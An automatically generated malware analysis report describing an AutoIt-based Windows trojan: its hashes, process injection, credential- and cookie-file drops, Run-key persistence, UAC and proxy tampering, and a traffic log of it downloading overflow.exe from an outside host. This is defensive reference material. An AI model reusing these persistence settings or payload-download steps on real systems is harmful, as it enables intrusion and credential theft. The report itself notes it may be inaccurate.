Gen.Variant.Zusy.187112_4ec9b2b7c1

by malwarelabrobot on February 26th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.187112 (B) (Emsisoft), Gen:Variant.Zusy.187112 (AdAware), Trojan.Win32.Swrort.3.FD, Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 4ec9b2b7c126b528677573a2c2dfe0b8
SHA1: 40779b0cb282d94650889b8ba8971e263914b6dd
SHA256: 90e517b1c3818b7e6c220ffbbba9f0f784f74f077239dfc67a9173604c3b966c
SSDeep: 12288:PMf1u7opqAqRMgK6rP21XBhnyjMTy4T7SYtjlGbiYpF7Wo5S:PMf87opgMgK6rPLjMT39lGuYpNF5S
Size: 686080 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company:
Created at: 2016-04-03 01:51:45
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

systeminfo.exe:2876
netsh.exe:3392
netsh.exe:3008
rundll32.exe:1912

The Trojan injects its code into the following process(es):

ntvdm.exe:952
nwtray.exe:1456
RegAsm.exe:1676
RegAsm.exe:2124
%original file name%.exe:3584
nvvswc.exe:4084

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ntvdm.exe:952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp (269 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp (0 bytes)

The process nwtray.exe:1456 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nwtray.exe (0 bytes)

The process RegAsm.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uwvcbwk (1960 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut53F9.tmp (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\pass.exe (773 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Passwords.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uwvcbwk (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut53F9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (0 bytes)

The process RegAsm.exe:2124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Passwords.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2B15.tmp (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Cookies.sqlite (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\icanhazip_com[1].txt (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jhpcqgh (1960 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2B15.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jhpcqgh (0 bytes)

The process rundll32.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3SAKMRE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VJOQ962C\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9M0U960C\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Q9A9DPUD\desktop.ini (67 bytes)

The process %original file name%.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nwtray.exe (4545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nvvswc.exe (9 bytes)

Registry activity

The process systeminfo.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E\@%SystemRoot%\system32]
"mlang.dll,-4386" = "English (United States)"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

The process RegAsm.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"TaskbarNoNotification" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 DF 6B EF 77 8F D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dllhost" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\AutoUpdate.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process RegAsm.exe:2124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "30 74 F1 ED 77 8F D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 74 F1 ED 77 8F D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"TaskbarNoNotification" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dllhost" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\AutoUpdate.exe"

The Trojan deletes the following value(s) in system registry:

The process netsh.exe:3392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E\@%SystemRoot%\system32]
"napipsec.dll,-4" = "1.0"
"eapqec.dll,-103" = "Microsoft Corporation"
"tsgqec.dll,-100" = "RD Gateway Quarantine Enforcement Client"
"tsgqec.dll,-103" = "Microsoft Corporation"
"napipsec.dll,-1" = "IPsec Relying Party"
"napipsec.dll,-2" = "Provides IPsec based enforcement for Network Access Protection"
"napipsec.dll,-3" = "Microsoft Corporation"
"eapqec.dll,-100" = "EAP Quarantine Enforcement Client"
"eapqec.dll,-101" = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."
"tsgqec.dll,-101" = "Provides RD Gateway enforcement for NAP"
"eapqec.dll,-102" = "1.0"
"dhcpqec.dll,-101" = "Provides DHCP based enforcement for NAP"
"dhcpqec.dll,-100" = "DHCP Quarantine Enforcement Client"
"dhcpqec.dll,-103" = "1.0"
"dhcpqec.dll,-102" = "Microsoft Corporation"
"tsgqec.dll,-102" = "1.0"

The process netsh.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

The process %original file name%.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process nvvswc.exe:4084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
278edbd499374bf73621f8c1f969d894	c:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe
59620c65f453f333275e6d417de34d68	c:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nvvswc.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Hamrick Software
Product Name: mycathedral
Product Version: 11.8.723
Legal Copyright: Copyright 2016 Hamrick Software
Legal Trademarks:
Original Filename:
Internal Name: mycathedral.exe
File Version: 11.8.723
File Description: Turbo Studio 16
Comments: VueScan
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	680676	680960	5.50529	245c32ce5d2c6d6163997c93e2d124d2
.rsrc	696320	4096	4096	3.4005	7f14182fda50a32a66cd01899658e3cb
.reloc	704512	12	512	0.070639	b3ddc6e72939d93b299d5faff902386b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://0v3rfl0w.com/overflow.exe	50.63.202.83
hxxp://icanhazip.com/	64.182.208.184

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET POLICY Internal Host Retrieving External IP via icanhazip.com - Possible Infection
ET TROJAN AutoIt Downloading EXE - Likely Malicious

Traffic

GET / HTTP/1.1

User-Agent: AutoIt

Host: icanhazip.com


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 25 Feb 2017 15:00:42 GMT

Content-Type: text/plain; charset=UTF-8

Content-Length: 15

Connection: close

X-SECURITY: This site doesn't distribute malware. Get the facts. hXXps://is.gd/1LWdFz

X-RTFM: Learn about this site at hXXp://bit.ly/icanhazip-faq and don't abuse the service.

X-BECOME-A-RACKER: If you're reading this, apply here: hXXps://VVV.rackspace.com/talent/

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET

194.242.96.226...

GET /overflow.exe HTTP/1.1

User-Agent: AutoIt

Host: 0v3rfl0w.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Type: text/html; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 25 Feb 2017 15:00:51 GMT

Content-Length: 773

Age: 0

Connection: keep-alive
..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head><t
itle></title>..<script src="hXXp://ak2.imgaft.com/script/j
query-1.3.1.min.js" type="text/javascript"></script>..<scr
ipt type="text/javascript" language="javascript">...$(document).rea
dy(function () {....jQuery.ajax({ url: 'hXXp://mcc.securepaynet.net/pa
rked/park.aspx/?q=pFHmpGOcZ2ImrGOdYaOvrvHlAzM2pFHmpGRlZQV5BQNmAvHlAzA2
pFHmpF04ZQH4ZGN1ZGx2ZwxkZmR5BGZjWGV2MJpyZ3RlZQR3ZQVlAGN4ZQN1ZFHlAzA5WG
AkZwt4At==-1', dataType: 'jsonp', type: 'GET', jsonpCallback: 'parkcal
lback',.....success: function (data) { if (data["returnval"] != null) 
{ window.location.href = 'hXXp://0v3rfl0w.com?nr='   data["returnval"]
; } else { window.location.href = 'hXXp://0v3rfl0w.com?hg=0' } }....})
;...});..</script></head><body></body></htm
l>HTTP/1.1 200 OK..Cache-Control: no-cache..Pragma: no-cache..Conte
nt-Type: text/html; charset=utf-8..Expires: -1..Server: Microsoft-IIS/
7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 25
 Feb 2017 15:00:51 GMT..Content-Length: 773..Age: 0..Connection: keep-
alive....<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head&g
t;<title></title>..<script src="hXXp://ak2.imgaft.com/s
cript/jquery-1.3.1.min.js" type="text/javascript"></script..<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

RegAsm.exe_2124:

`.rsrc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

Jv.AKv

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

zcÁ

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

GetCPInfo

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

SetViewportOrgEx

ShellExecuteExW

SHFileOperationW

ShellExecuteW

RegisterHotKey

GetKeyboardLayoutNameW

ExitWindowsEx

EnumThreadWindows

UnregisterHotKey

keybd_event

GetAsyncKeyState

SetKeyboardState

GetKeyboardState

GetKeyState

VkKeyScanW

EnumWindows

EnumChildWindows

MapVirtualKeyW

CloseWindowStation

SetProcessWindowStation

OpenWindowStationW

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

##@,&,//,))

.jQG2

3(-,'')-*/%'

9(***3).**-)'

H%d=j@

0!;....(

.text

`.rdata

@.data

.rsrc

@.reloc

_!0}129=

@.MfT

n..GGHHH

n...GGHHH

n ....HGHHHH

n  ....G.HHH

~~~~{~{{{{

n!! ....HGHHHH

n!!  .....HHHHHH

!!!  ....GGHHH

!!"".....HHHHnv

"""...-.nv

%SV@Gd

^hT%F

%uywu

.aO.$M

.Xap=

4[2Y%D

d}.HR

3-%Uo

..EeQ

y1W.xRV

.vttU

.%F:{

rWz.kS

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

COMDLG32.dll

GDI32.dll

IPHLPAPI.DLL

MPR.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

SHELL32.dll

USER32.dll

USERENV.dll

UxTheme.dll

VERSION.dll

WININET.dll

WINMM.dll

WSOCK32.dll

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

2.2.0.1

RegAsm.exe_2124_rwx_00400000_00121000:

`.rsrc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

Jv.AKv

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

zcÁ

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

GetCPInfo

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

SetViewportOrgEx

ShellExecuteExW

SHFileOperationW

ShellExecuteW

RegisterHotKey

GetKeyboardLayoutNameW

ExitWindowsEx

EnumThreadWindows

UnregisterHotKey

keybd_event

GetAsyncKeyState

SetKeyboardState

GetKeyboardState

GetKeyState

VkKeyScanW

EnumWindows

EnumChildWindows

MapVirtualKeyW

CloseWindowStation

SetProcessWindowStation

OpenWindowStationW

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

##@,&,//,))

.jQG2

3(-,'')-*/%'

9(***3).**-)'

H%d=j@

0!;....(

.text

`.rdata

@.data

.rsrc

@.reloc

_!0}129=

@.MfT

n..GGHHH

n...GGHHH

n ....HGHHHH

n  ....G.HHH

~~~~{~{{{{

n!! ....HGHHHH

n!!  .....HHHHHH

!!!  ....GGHHH

!!"".....HHHHnv

"""...-.nv

%SV@Gd

^hT%F

%uywu

.aO.$M

.Xap=

4[2Y%D

d}.HR

3-%Uo

..EeQ

y1W.xRV

.vttU

.%F:{

rWz.kS

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

COMDLG32.dll

GDI32.dll

IPHLPAPI.DLL

MPR.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

SHELL32.dll

USER32.dll

USERENV.dll

UxTheme.dll

VERSION.dll

WININET.dll

WINMM.dll

WSOCK32.dll

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

